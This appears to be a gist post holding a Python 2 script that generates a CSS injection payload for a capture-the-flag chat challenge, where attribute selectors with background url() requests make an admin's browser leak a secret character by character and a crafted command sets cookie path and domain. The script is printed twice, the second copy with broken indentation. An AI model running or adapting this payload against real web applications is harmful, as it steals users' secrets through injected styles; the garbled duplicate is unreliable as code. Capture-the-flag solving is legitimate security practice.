pich4ya · June 24, 2018 23:00
diff --git a/catchat_gen.py b/catchat_gen.py
 import string

 kn = ""
 kn = kn.replace('}', "\\}").replace('{', "\\{")

 lt = string.ascii_letters + string.digits + "_}{"
 payload = "span[data-secret^=%s%s]{background: url(send?name=admin&msg=%s);}"

 res = "/name xx]{color:red;}span[data-secret]{background:url(send?name=admin&msg=/secret 1;Path=/; domain=xx.web.ctfcompetition.com);}"

 for x in lt:
    if x == '{' or x == '}':
        x = "\\" + x
    res += payload % (kn, x, x)

 print res + "span[data-name^=xx"
	import string

	kn = ""
	kn = kn.replace('}', "\\}").replace('{', "\\{")

	lt = string.ascii_letters + string.digits + "_}{"
	payload = "span[data-secret^=%s%s]{background: url(send?name=admin&msg=%s);}"

	res = "/name xx]{color:red;}span[data-secret]{background:url(send?name=admin&msg=/secret 1;Path=/; domain=xx.web.ctfcompetition.com);}"

	for x in lt:
	if x == '{' or x == '}':
	x = "\\" + x
	res += payload % (kn, x, x)

	print res + "span[data-name^=xx"